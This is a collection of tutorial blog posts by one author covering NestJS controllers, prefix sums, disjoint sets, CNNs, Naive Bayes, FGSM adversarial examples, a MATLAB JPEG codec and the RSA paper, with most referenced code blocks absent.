
Controllers

Controllers are the codes to receive requests and send responses. It works like a bank teller. Here is a piece of code of controller:

Mention that you should not write any implementation in controller layers (although you are allowed) since service layers are designed for code reuse.

Controllers should handle HTTP requests and delegate more complex tasks to services, which are plain TypeScript classes that are declared as providers in a module (building block that helps organize and structure the code of your application) as following code.

Services

NestJS utilizes the concept of "providers" for creating and managing services. In NestJS, a provider is a class annotated with the @Injectable()decorator

You may like to alternate the generated code inside app.service.ts to play with implementation of business logics.

By visiting localhost:3000, you get Hello World! And the current time is 12:06:50 PM.

You should implement any business logics inside Services. As the following code given, the getCurrentTime() method get a current local time. It is declared with private means the method can only be called inside app.service.ts.

Method Scoping (annotated with private, public, ...) is important since it provides functions of encapsulation, security. It also create a maintainable code.

Here is why it provides a maintainable code: Image that you are at a bank. You have a business account and an individual account. You go to the business counter: /business/deposit and you sign a form (request JSON)

The counter teller knows that you want to deposit 1000 USD to account 99887766, and you also provide a legal signature (authentication), which means you are actually you (although it can be forfeit by some approaches such as 51% attack).

The service code inside business.service.ts may be look like:

The private scope states that transaction() can be only used in business.service.ts, which means it handles only business services. When we implement individual.service.ts, there can also be a private transaction() method for individual services, which creates a maintainability. (otherwise we may write code transaction_business() and transaction_individual() )

Routing Mechanism and RESTful convention

Controllers need routing mechanism (there are different bank services, individual, business, ...). Routing is implemented by concating of URL. A RESTful design (convention) of URL is like:

/account/create
/account/{id}/delete
/account/{id}/update
/account/{id}
/item/{id}
/items
/item/page/10

Where {id} is user id for any individual users, such as 1145141919810. The URLs in the previous code blocks represents create a user, delete a user according to his/hers id, such as /account/1145141919810/delete, update a user according to id, and read user information (such as email) according to a id. Generally speaking, what server's job, commonly, are Create, Read, Update and Delete (CRUD).

/items/{id} demostrates routing. The manipulation within the Controller that listening on the URL starts with item is item-related. Image an online shopping website, if we want to get information of a specific item by its item id.

/items, as you guess, this URL is for retrieving all items (products) as a huge list.

Similarly, follow the RESTful convention, /item/page/10 retrieving a specific page (the 10th page) of a collection of items. It works for pagination of a list of products in an online shopping website, since using one page to display all products is slow.

Note: in a modern front-end back-end separation design of web applications. These URLs returns a JSON rather than a rendered web page. Front-end back-end separation design is much similar to the pattern of Mobile/Embedded Application design.

Prefix Sum with HashMap: Time Complexity Optimization

Ex10si0n Yan — Sat, 18 Nov 2023 03:18:00 GMT

LeetCode 560

Subarray Sum Equals K - LeetCode

Can you solve this real interview question? Subarray Sum Equals K - Given an array of integers nums and an integer k, return the total number of subarrays whose sum equals to k. A subarray is a contiguous non-empty sequence of elements within an array. Example 1: Input: nums = [1,1,1], k = 2 Output: 2 Example 2: Input: nums = [1,2,3], k = 3 Output: 2 Constraints: * 1 <= nums.length <= 2 * 104 * -1000 <= nums[i] <= 1000 * -107 <= k <= 107

LeetCode

LeetCode 560

Reviewing question 560, an array nums and a target k is given to determine the number of sub-arrays res which having sum of interval equals k. Such that, giving array nums = [1, 1, 1, 1, 1, 1] and k = 4. The result res will be 3, target sub-array set contains nums[0:3], nums[1:4] and nums[2:5].

Adopting Prefix Sum

Since the time complexity of calculating sum of interval for a specific interval is $O(n)$:

If we want to calculate interval of sum more than one time, such as the problem 560, we should utilize Prefix Sum, which, $O(n)$ for constructing pref array and $O(1)$ for querying a specific interval, say [L, R]:

Back to the Problem

In the problem, we need to check sum of intervals of each specific pair of L and R, since there are negative elements in nums.

The brute force code can be easily written using two for loop, which incurs a square time complexity $O(n^2)$.

From observation, we notice that:

When we considering each R, to find sum of interval starts with each L ranging from 0 to R, a linear time is needed to deduct the pref[R] by each pref[L].

Since scanning each pref[L] linearly is a little bit waste of time, so we can consider utilizing some spaces to trade time. We can adopt a dictionary (HashMap).

Consider that:

In the inner for loop of L, we want to know how many L's can satisfy pref[R] - pref[L] == k, equivalent to pref[L] == pref[R] - k.
We adopt a dictionary d to maintain number of L's having Prefix Sum as the key of d, hence d[i] means number of L satisfying pref[L] == i.
Then we break the inner loop by res += d[pref[R] - k], that's wise, isn't it?
Finally we update the dictionary d by the loop of R (refer to the following code).
Note that we should initalize d by d = {0: 1}, think about why we should do so. (That is similar to we initialize pref using pref=[0]. Because there can be a sum of interval starting from the first element)

We have cancelled out pref[L]. We can also discard pref[R]. The reason of it is R is in the outer loop, and it can totally combined with the previous loop for calculating pref. We also discard the pref array to make it calculate-on-use.

Conclusion

We use a dictionary (HashMap) to replace the inner for loop for variable L, and we modify the code to eliminate the need for the 'pref' array. As a result, the time complexity is reduced from quadratic time to linear time. This technique is quite useful and can be applied to more LeetCode problems.

Disjoint Set: City Connection Problem

Ex10si0n Yan — Wed, 18 Oct 2023 04:20:00 GMT

City Connection Problem

Let us consider a scenario of connecting cities with highways. The question is how we can determine if it is possible to travel from one city to another only by highways. To solve this problem, we can use the Union-Find Disjoint Sets, also known as disjoint sets.

Reading in Roads Info

Since we are focusing on the interconnections between cities on the map, we will denote two interconnected cities as X –- Y, where X and Y represent the city names. For example:

1 -- 3
1 -- 2
2 -- 4
3 -- 4
5 -- 6
6 -- 7

The notations -- indicate a interconnection of each pair of cities. We can build a graph according to the specification, like this:

In this graph, if we want to check if city 4 is connected with city 7, we can use search algorithms such as Depth-first Search (DFS) or Breadth-first Search (BFS). If we want to make sure we cannot go to city 7 from city 4, we must traverse all around the left 1-2-4-3-1 trace. The time complexity of the checking is $O(N)$.

If we are focusing on the knowledge about if they are interconnected, the more time-efficient way is to build disjoint sets, then we can lower down the time complexity with the help of trees.

How Disjoint Set works

Modeling this problem using the graph theory, we can regard each cities as a node, as shown in the figure. At first, we can initiate each node having their parent node as itself since disjoint sets work as a forest (trees) data structure (tree have a root node). In the current scenario, every node is a root node and there are 7 trees in this figure, which can easily illustrated by the Python code:

Now we read in the data of how the junctions connected. Such as 1 -- 3, we need to change the parent of one node to another (whatever it is node 1 or node 3). The diagram illustrate the result of disjoint sets after alternation.

Okay, seems easy. Let us do the next link, 1 -- 2. Follow with the rules of tree, a node in a tree can only have one parent. If we change the parent of node 1 to node 2, node 3 could no longer be parent of node 1, which causes loss of information. The solution is pretty straight-forward, since each root node have parent node as themselves. Since each group of interconnected nodes can be identified by different root nodes, if node 2 want to join the group which having root node is node 3, then just simply change the parent of node 3 (group root node) to node 2.

Here are the rules:

1. If we are going to link two nodes which are in different groups (single node is also considered as a group), link the root nodes of each groups together.

2. If we are going to link two nodes which are in the same group (having the same group root node), do nothing.

The Python code for finding a group's root node is:

By applying the rule, we can finally get following trees after linked 6 -- 7:

In the final result, 6 -- 7, we have two groups, root node 4 and root node 7. Back to the question, to check if node 4 and node 7 are interconnected, we need to check if parent_of(4) is equal to parent_of(7).

However, currently, the worse case of disjoint sets is that trees are builded as a linked list (degenerate into a chain), as the example given. The time complexity is still similar to that of utilizing search algorithms. To tackle the issue, we must update the current disjoint set into a 1-depth tree, as illustrated in the following figure.

The following updated parent_of(node) function can implement this action

Algorithms that Disjoint Set inspires

The Kruskal algorithm in minimum spanning tree and the Tarjan algorithm in least common ancestor (LCA) are both based on the disjoint-set data structure. A disjoint-set is a data structure used for solving the union-find problem, which involves partitioning elements into disjoint sets and supporting queries to determine if two elements are in the same set.

When we utilize path compression to obtain disjoint sets, the time complexity of checking if two nodes are interconnected becomes optimized to the level of the tree, which is $O(\alpha(n))$.

The average time complexity for each operation in a disjoint-set data structure is only $O(\alpha(n))$, where $\alpha$ is the inverse of the Ackermann function. The growth of $\alpha(n)$ is extremely slow, meaning that the average running time for a single operation can be considered a very small constant ^[1].

The definition of the Ackermann function $A(m, n)$ is:

$$
A(m, n) =
\begin{cases}
n+1&\text{if }m=0 \\
A(m-1,1)&\text{if }m>0\text{ and }n=0 \\
A(m-1,A(m,n-1))&\text{otherwise}
\end{cases}
$$

https://oi-wiki.org/ds/dsu/ ↩︎

Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns

Ex10si0n Yan — Sat, 29 Apr 2023 00:00:00 GMT

Implementing Neural Networks from Scratch

In this post, we’ll understand how neural networks work while implementing one from scratch in Python.

AspiresEx10si0n Yan

In the previous post, we introduced how a Neural Network learns in aspect of mathematical simulation of neurons. In this post, we will introduce the advanced architecture of neuron networks - Convolution Neural Networks - which, in some aspect, forms a vision that can extract features automatically.

Filtering & Kernels

In the area of Digital Image Processing, it is well-known that there are many kinds of filters to fulfill a specific kind of work, such as border detection, blurring, sharpening, etc.

CNN can classify MNIST dataset

As an example of applying border detection on a grayscale image, the Sobel and Laplacian Edge Detectors can detect the border (sudden change of pixel values) via the filter, or say kernel, for the Laplacian operator:

$$\begin{bmatrix} -1 & -1 & -1 \\ -1 & 8 & -1 \\ -1 & -1 & -1 \end{bmatrix} $$

The filter then be applied to the image as sliding window, as shown in the animation below:

2D Sliding Window

What happens in each filtering (white box in the front) follows the below calculation:

Calculation in Image Filtering

Due to the characteristics ^[1] of kernel design, borders could be detected as shown in the image below.

https://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm ↩︎

Convolution

Image filtering and convolution are two closely related concepts used in image processing, however; they have a slightly difference:

The convolution operation moves the input image to desired time (you can regard it as going cross-wise rather than parallel*, since the term time in signal processing represents time-frequency related to spatial-frequency)

To a better understanding, it doesn't matter to regard convolution as a way of filtering since the key here is to shrink the size of image while retraining its features as much as possible.

Fully Automatic on Parameter Optimizing

By recapping the gradient descent in training a Neural Network, we know that:

Learning is in fact minimizing the loss automatically
The loss is determined by data (X), label (y), weights and bias (W, b)
Data(X), and label(y) cannot be change (usually) since they are ground truth
The network parameters weights and bias (W, b) can be changed to optimize the performance of that network
In back-propagation, weights and bias (W, b) are descent by gradient of loss with respect to each weight and bias respectively

Hence, the Neural Net can learn by changing its network parameters, i.e. weights and bias (W, b).

So How to Determine the Kernel?

By the gradient descent, the neural network can learned by updating its parameters. However, the CNN architecture is firstly comes with Convolutional Layers, connected with a Fully Connected Layer, or say deep neural network. Note that the Convolutional Layers contain kernel for each specific layers, the kernel is simply set as a random matrix. The key point is each kernel can be also updated by the gradient descent:

During the training process, each entry of the kernel is updated by calculating the partial derivative of the loss function with respect to that entry of the kernel.

Wow, the kernels can also learn by itself. As different training data, the kernel can be formed to a specific matrix which are relatively optimal to the specific task regardless to classification and segmentation.

Extracting Features and Poolings

Although CNN can handle the task other than images, we simply use the most classical task - image classification - to illustrate the process. A colored image is usually adopting RGB format, which contains three channels, Red, Green, Blue, respectively. The image of Lena is a classical computer image processing example, the following are the RGB channels, for example, the Red channel have only the magnitude of red color, the lighter pixel the higher magnitude it is. The colored image of Lena is the composition of magnitudes of the three color channels.

RGB Extraction

For a CNN, to handle the colored image, we usually apply a 3 channel to n channel convlution layer firstly. In the following diagram, each black b0x is a kernel.

To simplified, we set all the kernel to 3x3, hence 26x26 image can be reduced to 24x24 since no image paddings are used.

In the first step (Conv 26x26x3 -> 24x24x6), a 26x26x3 image are turned into a 24x24x6 image. The process is conducted by 6 (1) different (initialized by random) 3x3x3 (2) convolution kernels.

6 kernels can generate 6 different 2D features (we usually regard the images in the middle process as features).
Note that the 3x3x3 is designed by (kernel width, kernel height, kernel channels). The 3x3x3 kernel is a 3D kernel to calculate convolution for each RGB channels of the original images respectively.

Then, the next step (Pool 24x24x6 -> 12x12x6), let us use a max-pool to illustrate the process. Pooling is the same as Subsampling, which, retrain only the representative such as the maximum in a kernel size matrix. It is clear to see that the image size is divided by the kernel size after applying the pooling.

Pooling, GIF from victorzhou.com

In the previous diagram, we applied further convolution and pooling, which also follow the corresponding process. Finally, the 3x3x12 feature are flattened into a 1x108 linear layer of neurons, then they are connected to classical deep neural network, and a 10 classification results are shown in the output layer (1x10).

Conclusion

In this post, we have learned:

The neural network can extract features from alternating the convolution kernel matrices in the back-propagation process by gradient descent.
CNN layers are usually containing Convolution and Pooling to shrink the huge size of input neurons.
After Convolution and Pooling, the features are usually flattened and connected to fully connected layers.
The CNN architecture employs kenneling and subsampling to simplified the related neighborhood of pixels which could generate data redundancy.

Understanding Naïve Bayes Algorithm: Play with Probabilities

Ex10si0n Yan — Tue, 14 Feb 2023 21:05:00 GMT

Naïve Bayes Algorithm, mainly refers Multinomial Naïve Bayes Classifier, is a machine learning algorithm for classification. It mathematically based on the Bayes Theorem:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

It is easy to prove based on some prior knowledge on Joint probability

$$P(A\cap B)=P(A|B) \cdot P(B)$$

$$P(A\cap B)=P(B|A) \cdot P(A)$$

Hence, we can connect these two formula via $P(A\cap B)$

$$P(A|B) \cdot P(B) = P(B|A) \cdot P(A)$$

Divide both side with $P(B)$,

$$P(A|B) = \frac{P(B|A) \cdot P(A)}{P(B)}$$

Bayes Theorem

Here is an exercise on Wikipedia: Drug testing

Confusion Matrix, Image from Evidently AI

Suppose, a particular test for whether someone has been using cannabis is 90% sensitive, meaning the true positive rate (TPR) = 0.90. Therefore, it leads to 90% true positive results (correct identification of drug use) for cannabis users.

The test is also 80% specific, meaning true negative rate (TNR) = 0.80. Therefore, the test correctly identifies 80% of non-use for non-users, but also generates 20% false positives, or false positive rate (FPR) = 0.20, for non-users.

Assuming 0.05 prevalence, meaning 5% of people use cannabis, what is the probability that a random person who tests positive is really a cannabis user?

$$P(pred_T|real_T) = 0.9$$

$$P(pred_T|real_F) = 0.2$$

$$P(real_T) = 0.05$$

find $P(real_T|pred_T) = ?$

$$P(real_T|pred_T) = \frac{P(pred_T|real_T)P(real_T)}{P(pred_T)}$$

$$P(pred_T)=P(pred_T|real_T)*P(real_T)+P(pred_T|real_F)*P(real_F)$$

$$=\frac{0.9*0.05}{0.05*0.9+0.95*0.2}=0.1914893617$$

Classes and Features

The idea here is to find a class (or say classify) of given features, where class refers to prediction result and features refers all attributes for a specific $X$.

Note that we let $X_i$ be monthly income, martial status of a person, or frequencies of some words in an email, or number of bedrooms, size, distance from subway of a house (which could determine its renting price).

Besides, we could let $y$ be a result corresponding to these $X_i$'s, such as monthly income, martial status of a person may infer the willingness of purchasing by an advertisement, frequencies of some words (free, refund, paid, special) could infer the spam email.

Priors

Since we have figured out the $X$ (feature) and $y$ (class), it is clear that we have frequencies of $X$ and $y$ from statistics. Mathematically, they are $P(\text{feature}_i) = \frac{n(\text{feature}_i)}{n(\text{all})} $ and $P(\text{class}) = \frac{n(\text{class})}{n(\text{all})}$. These kind of probabilities are called priors.

According to the Bayes Theorem which mentioned before:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

The bridge connects $P(\text{class}|\text{feature})$ and priors are $P(\text{feature}|\text{class})$. But what are they?

Conditional Probability

In Statistics $P(A|B)$ is conditional probability. $P(A|B)$ is the probability of event $A$ given that event $B$ has occurred. For example, let event B as earthquake, and event A as tsunami. $P(\text{tsunami}|\text{earthquake})$ means when an earthquake happens, the probability of happening a tsunami at the same time. Out of common sense, $P(\text{tsunami}|\text{earthquake})$ is lower when the location of earthquake is far from a coast.

Back to the feature-class, $P(\text{class}|\text{feature})$ and $P(\text{feature}|\text{class})$ refer to two different condition, obviously. Let us make the feature-class be:

$A=P(\text{is spam}|\text{free, refund, paid, special})$ means when a email contains these words: free, refund, paid, special; the probability of it is a spam.

$B=P(\text{free, refund, paid, special}|\text{is spam})$ means when a email is spam (we have already know that), the probability of it containing these words: free, refund, paid, special.

Posteriors

From the previous A and B, we know that B can be easily calculated from given data (in machine learning, we always have some lines of data as input of algorithms), which is "empirical".

While A refers the probability of the email is a spam if given data contains free, refund, paid, special. When the system read an email, and get the vocabulary frequency, it could have these situations:

free       contains | not contains
refund     contains | not contains
paid       contains | not contains
special    contains | not contains

There could be $2^4$ possible combinations of the 4 words. For all emails, they must meet one of the combinations of these words. Hence, we can get a True-False attributes set for the 4 words.

For example, (True, True, True, False) indicates that email contains "free", "refund", "paid" but not contains "special". Then we can get two possibilities.

$$C = P(\text{is spam}|\text{free, refund, paid, not special})$$

$$D = P(\text{is not spam}|\text{free, refund, paid, not special})$$

The task, to find out if the email contains free, refund, paid, but not contains special is a spam, could be converted into find $\max(C, D)$. If C is larger, the email is higher likely to be a spam. Then the classifier could tell the probability of the email contains free, refund, paid, but not contains special is a spam (such as 75%).

Integration

The class-feature $P(\text{class}|\text{feature})$ works as classifier, and it is calculated by Bayes Theorem:

$$P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$

The training process could be mathematically converted into calculation by the given formula.

With the aid of following formulas

$$P(\text{f}|\text{c}) = P(\text{f}_1|\text{c}) \times P(\text{f}_2|\text{c}) \times ... \times P(\text{f}_n|\text{c})$$

$$P(\text{f}) = P(\text{f}_1) \times P(\text{f}_2) \times ... \times P(\text{f}_n)$$

We could cumprod each probabilities and get the posteriors easily.

Implementation

The code implements a Naïve Bayes classifier for finding out if a user will purchase from the advertisement from given features: gender, age, estimation salary.

The data could be downloaded from: https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv

wget https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv

Data Preprocessing

The provided code reads data from a CSV file, separates the headers and data, splits it into training and testing sets, and further splits them into features and labels.

Calculate all of the conditional probabilities

Calculate all of the priors

Applying the Bayes Theorem

Result

View full code here:

machine-learning/naive-bayes at main · Ex10si0n/machine-learning

Tutorial of Python Machine Learning Implementation on Linux - machine-learning/naive-bayes at main · Ex10si0n/machine-learning

GitHubEx10si0n

Conclusion

Naïve Bayes is a fast and simple algorithm that requires a little training data, making it suitable for large datasets or data with limited labeled examples. It also has the advantage of being able to handle multiple classes, making it a popular choice for text classification and spam filtering.

In conclusion, Naïve Bayes is a simple yet powerful algorithm that is widely used in many real-world applications. Despite its "naïve" assumption of independent features, it has proven to be a reliable method for classification in many scenarios.

Gradient Attack: A Brief Explanation on Adversarial Attack

Ex10si0n Yan — Thu, 01 Dec 2022 21:32:00 GMT

The core implementation of the neural network is feedforward and backpropagation. Feedforward passes a series of inputs enter the layer, and these inputs are multiplied by the weights. Each value is then added together to get a sum of the weighted input values. It often works with activation functions to scale the classification sensitivity in each neuron.

If you are not familiar with deep learning and neural networks, I highly recommend you to read the previous post: Implementing Neural Networks from Scratch

Implementing Neural Networks from Scratch

In this post, we’ll understand how neural networks work while implementing one from scratch in Python.

Aspires - Ex10si0nEx10si0n

Backpropagation is for computing the gradients rapidly. In short, what backpropagation does for us is gradient (slope in higher dimensions) calculation. The procedure is straightforward; by adjusting the weights and biases throughout the network, the desired output could be produced from the network. For example, if the output neuron is 0, adjust the weights and biases inside the network to get an output closer to 0. This process is done by minimizing the loss, which needs to be descent by referencing the gradient on the loss function on each parameter (i.e., weights and biases) of every single neuron in the network.

Calculating the gradient in backpropagation could be influenced by each input data X. Usually, the parameters (weights and biases) in the network are adjusted according to the gradient calculated in backpropagation to minimize the loss function. Inversely, the loss is more considerable when the parameters are adjusted to maximize the loss function by going up in the opposite direction.

Adversarial Attacks

The adversarial vulnerability of deep neural networks has attracted considerable attention in recent years. The adversarial attack is a technique that can deviate the results of Neural Network models to produce wrong predictions—for example, shown in Figure 1, consider that we have a photo of a panda and a CNN model that can accurately categorize a panda image as a label of class “panda”. Adversarial attack techniques (e.g., Fast Gradient Sign Method, 1-pixel attack, and PGD-based attack) can produce a perturbed panda image, called adversarial examples, based on the panda image given and parameters from the CNN classifier. The difference between the adversarial example and the original image from the dataset is hard to observe by human perception. Nevertheless, the CNN classifier wrongly classifies the perturbed image of the panda as other targets, like a gibbon, as a result.

Generating Adversarial Perturbation

Types of Adversarial Attacks

From the perspective of result achieving, adversarial attacks can be classified into two categories — targeted attacks and untargeted attacks. The targeted attack aims to make the model misclassify a specific class to another given class (target class). On the other hand, the untargeted attack does not have a target class; the goal is simply to make the target model misclassify that specific class.

From the perspective of the right of accessing model parameters, there are white box and black box attacks. A white box attack is one where everything about the deployed model is known, such as inputs, model structure, and specific model internals like weights or coefficient values. In most cases, this means explicitly that the developers have the right to access the internal gradient values of the model. Some researchers also include knowing the entire training data set in white box attacks. Conversely, a black box attack is one where they only know the model inputs and query for output labels or confidence scores.

FGSM Adversarial Attack

One of the most popular methods is the Fast Gradient Sign Method (FGSM) introduced by Ian Goodfellow et al. to create adversarial examples. The paper showed that the FGSM attacks could result in 89.4% misidentification (97.6% confidence) on the original model.

The method of FGSM aims to alternate the input of a deep learning model to a maximum loss using the gradients from backpropagation. Assume that a neural network with intrinsic parameters (weights and biases of each neuron) and the loss function of that neural network is. FGSM algorithm calculates the partial deviation of the loss function to get the direction (sign) to maximum loss increment and add the direction multiplied by the variable (usually a tiny floating number) to each input. Equation 1 describes the mathematical representation of this procedure.

$$x_{adv} = x + \epsilon \times sign(\nabla_xJ(\theta, X, Y))$$

Linear Explanation of Adversarial Examples

Commonly, digital images often use 8 bits per pixel for storing the data, so all information below the atomic size is discarded. Because the precision of the features is limited, the classifier could not give a disparate classification under two input $x$ and $\widetilde{x} = x + \eta$ if every element of the perturbation $\eta$ is smaller than the atomic size. As long as $\max(\eta) < \epsilon$ where $\epsilon$ is small enough to be discarded by the classifier, we expect the classifier to assign the same class to $x$ and $\hat{x}$. Hence the dot product between $w$ and $x$, $\widetilde{x}$

$$w^\top\widetilde{x} = w^\top x+w^\top \eta$$

If $w$ has $n$ dimensions and the average magnitude of an element of the weight vector is $m$, by assigning $\eta = \text{sign}(w)$ where $\text{sign}(x) = +1$ for all $x>0$ and $\text{sign}(x) = -1$ for all $x<0$, then the weighted input $w^\top \widetilde{x}$ will grow by $\epsilon m n$. For high dimensional problems, if we make many infinitesimal changes to the $x$ that adds up to one significant change to the output.

Adversarial Training

Since adversarial examples $\widetilde{x}$ are generated by the input data and the model parameters to make a misclassification to the classifier. However, it is intuitively that if we label the $\widetilde{x}$ to its original class and retrain the model on those examples and their correct labels, this fine-tuning approach by numerous adversarial examples will make the model more robust against adversarial attacks.

In 2019, Tasnim et al. ^[1] proposed a data augmentation approach by introducing InvFGSM adversarial learning attack techniques for medical image segmentation, which achieved higher accuracy and robustness
In 2022, Xie et al. ^[2] introduced AdvProp (Adversarial Propagation) to improve the recognition accuracy of original data using separate batches for original data and adversarial examples generated by PGD attacks. Their framework achieved 85.2% classification accuracy in ImageNet using adversarial training technique and has a 0.7% growth higher than vanilla training.

According to the literature, adversarial training is a plausible way of enhancing the robustness of a model and a possible way to increase model performance, such as accuracy and AUC, which needs further research and experiments.

Implementing JPEG Image Compression Algorithm using MATLAB

Ex10si0n Yan — Mon, 14 Nov 2022 00:00:00 GMT

The JPEG (or JPG) format is not technically a file format, but rather an image compression standard. The JPEG standard is complex, with various options and color space regulations. However, it was not widely adopted. Simultaneously, a simpler version called JFIF was advocated. This is the image compression algorithm commonly referred to as JPEG compression, and the one we will be discussing in this class. It's worth noting that the file extensions .jpeg and .jpg have persisted, even though the underlying algorithm strictly follows JFIF compression.

The Underlying Assumptions of the JPEG Algorithm

The JPEG algorithm is designed specifically for the human eye. It exploits the following biological properties of human sight:

We are more sensitive to the illuminocity of color, rather than the chromatric value of an image
We are not particularly sensitive to high-frequency content in images.

The algorithm can be neatly illustrated in the following diagram:

Matlab Implementation: Encoder

Assume img is the image we have read in. In JPEG compression, all compression processes should be carried on in YCbCr color space. In this color space, Cb is the blue component relative to the green component while Cr is the red component relative to the green component.

What is YCbCr ? (Color Spaces)

YCbCr is a color space. that means YCbCr is another colour space just like RGB. I’ll explain bot more in the following sections

Break the LoopDanoja Dias

Here is the built-in Matlab code for converting the color space.

The YCbCr is a more convenient colorspace for image compression because it separates an image's illuminance and chromatic strength. Since our eyes are not particularly sensitive to chrominance, we can "downsample" that. Here, half the amount of "color" and generate the Y_dsp representing downsampled Y. The difference between original and downsampled image is imperceptible, as you can see from the result.

Downsampling, Image from pi.math.cornell.edu

Following the steps, we need to apply the following processes for each 8x8 blocks in the image. Y_dct is the matrix contains frequency domain of original image specifically for every 8x8 block. In another word, we apply discrete cosine transform (DCT) for every 8x8 block and store these 8x8 results matrices into Y_dct.

Then we apply DCT inside the preceding tripe for loop, this process transform the original image from spatial domain to frequency domain:

Quantization is a process in which we take a couple of values in a specific range and turns them into a discrete value. (also called discretization). It is intuitive that after DCT, quantization converts the higher frequency coefficients in the output matrix to 0.

Besides, the intensity of quantization determines the extend of data retaining for the image. Quantization is applied and how much of higher frequency information is lost, and this is the reason why JPEG is a lossy compression.

Since we have got the matrix in frequency domain, we could apply quantization using a quantization table Q.

After quantization, the image has been compressed a lot, however; in order to have a extreme compression, we should consider the potential of compressing the quantized data using entropy coding (i.e. Huffman Coding).

However, since Y_dct now is a 2D matrix, we need to convert it to 1D firstly. Yet, there is many ways of converting 2D array to 1D. Due to the characteristic of "DCTed" array - large numbers always lies on top-left, zig-zag is a better choice.

To implement zig-zag, we could declare a zig-zag table as follows.

This table is designed by the process of zig-zagging, which is illustrated in the following diagram. Zig-zag ensures top-left first, then positive (non-negative) numbers in the generated 1D array should be lies on the staring points.

Here is the code for zig-zagging.

Till now, we have turned the 2D Y_dct into Y_lin which represents linear 1D array. To better handling this 1D array, DC and AC are two essential part to be implemented.

DC is the different first digit of Y_lin between the preceding first digit for every adjacent 8x8 blocks. AC is the rest of digits (2, 64) in Y_lin for the current 8x8 block.

AC should be applied with Run Length Encoding (RLE) if you are not familiar with this, please refer: filestore.aqa.org.uk(PDF). The code below is RLE codec.

Hence, we could apply RLE to AC, and append BC, AC to a data payload.

Huffman encoding is a pretty concise and elaborate entropy encoding yields optimal prefix code that is commonly used for lossless data compression. Code for a simple implementation of Huffman encoding in Python could be found at:

GitHub - Ex10si0n/hzip: a cli tool for zip files written in python

a cli tool for zip files written in python. Contribute to Ex10si0n/hzip development by creating an account on GitHub.

GitHubEx10si0n

Then we could apply built-in Huffman encoding to all payloads all at onces.

Then we could store dict into header and bit_stream as compressed image data, they encapsulate them to a single file. That's it, we have implemented a JPEG encoder (Image to bitstream) now.

Matlab Implementation: Bit stream

In the generated data (say bit stream), it should store some information inside its header, such as, dictionary header_dict used for huffman encoding. Moreover, since AC was applied through RLE, and then we encapsulate it with DC inside a payload. There should be a header for maintaining how long for each payload, in this implementation, we uses header_ac_seperator to store this information. Besides, resolution of orginial image should also be stored because without it we cannot specify the image row-column ratio when rebuilding it, that make sense. Finally, quality coeffeicient should also be stored in the header since it is determined only when encoding.

Matlab Implementation: Decoder

Inversely, to employ JPEG decoder, just inverse these processes. Firstly, after receiving content for bit stream, we apply huffman decoding to it

Then, refering header_ac_seperator, we could re-constructuct each payload [DC AC] which we have mentioned previously.

Then, we applied inverse zig-zag using the same zig-zagging sequence, inverse quatization, and inverse DCT.

We can rebuild each block in the image.

To make the iteration works, some iteration variables should be changed during the loop

Finally, we change the color space from YCbCr to RGB

Run it and have a look.

We can see the image compression ratio in comparing original headless image data vs. compressed header and content:

   Compression coefficient: 1.1800
Before compression (bytes): 480000
 After compression (bvtes): 304188
         Compression ratio: 1.5780
           PSNR value (dB): 65.829

Bingo! We have achieved a JPEG decoder now by inversely designing the encoder. Take a look at the decoded compressed image.

Before Compression

After Compression

We can see that in the compressed image, pixels on the edges of the guy is quite weird, it is because the mini-block-wise DCT sampling have different rounded value. To compared with the original image, the image different could be calculated by setting threshold as 3.

Now we have visualized the different between original and compressed image.

Image Diff

Conclusion

We have implemented a JPEG codec in this tutorial, now you have learned:

YCbCr color space
Discrete Cosine Transform and Inverse Discrete Cosine Transform (to be added)
JPEG encoding process (image to blocks - DCT - quantization - zigzagging - entropy encoding - encapsulation)
JPEG decoding process (decapsulation - entropy decoding - inverse zigzagging - inverse quantization - iDCT - blocks to image)
Some of the JPEG headers

You can find the code at my Github via the following link:

GitHub - Ex10si0n/jpeg-codec: MATLAB implementation of a simple JPEG codec

MATLAB implementation of a simple JPEG codec. Contribute to Ex10si0n/jpeg-codec development by creating an account on GitHub.

GitHubEx10si0n

RSA Digital Signatures and Public-Key Cryptosystems

Ex10si0n Yan — Sat, 12 Nov 2022 00:00:00 GMT

This post is a paper review on the RSA algorithm proposed by R.L. Rivest, A.Shamir, and L.Adleman. Their proposed algorithm has a wide application in public-key cryptography in network security of maintaining secure data communication.

All classical encryption methods (including the NBS standard by IBM) suffer from the "key distribution problem." The problem is that before a private communication can begin, another private transaction is necessary to distribute corresponding encryption and decryption keys to the sender and receiver, respectively. Typically a private courier is used to carry a key from the sender to the receiver. Such a practice is not feasible if an electronic mail system is to be rapid and inexpensive. Instead, a public-key cryptosystem needs no private couriers; there should be an algorithm to distribute their secret keys to the sender and receiver over the insecure communications channel.

Public Key Cryptosystems

RSA is an implementation of a "public-key cryptosystem". The concept of "public-key cryptosystem" was invented by Diffie and Hellman's work [1]. The cryptosystem should meet these properties:

(a) D(E(M)) = M
(b) D and E should be in low time complexity
(c) The process is efficient iff E for encrypt and D for decrypt
(d) E(D(M)) = M

A function $E$ compliance (a), (b), and (c) is a "trap-door one-way function", additionally; if it also satisfies (d), then it is a "trap-door one-way permutation". The two concepts of "trap-door one-way" are introduced in [1]. In the reviewed paper, the author explained that a function is "one-way" since it is easy to compute in one direction but very difficult to compute in the reversed direction. The function is called "trap-door" since its inverse is easy to compute once certain private "trap-door" information is known.

Assume Alice has a secret decryption function $D_A$ and a public encryption function $E_A$ which could be called by anyone. Similarly, Bob has private $D_B$ and a public $E_B$. If Bob wants to send a private message to Alice in a public-key cryptosystem, he should first retrieve $E_A$ from the public. Then he sends Alice the encrypted message $E_A(M)$. On Alice's side, she deciphers the message sent from Bob by calculating $D_A(E_A(M)) = M$. According to the property: the process is efficient iff E for encrypt and D for decrypt, which means only Alice can decipher $E_A(M)$. This process maintains private communication between Alice and Bob without private transactions (symmetric ciphered transaction).

Signatures

In the previous example, Bob could guarantee the message could only be seen by Alice since Bob uses $E_A$ to encrypt the message. However, from Alice's perspective, she could not guarantee that the message was from the real Bob.

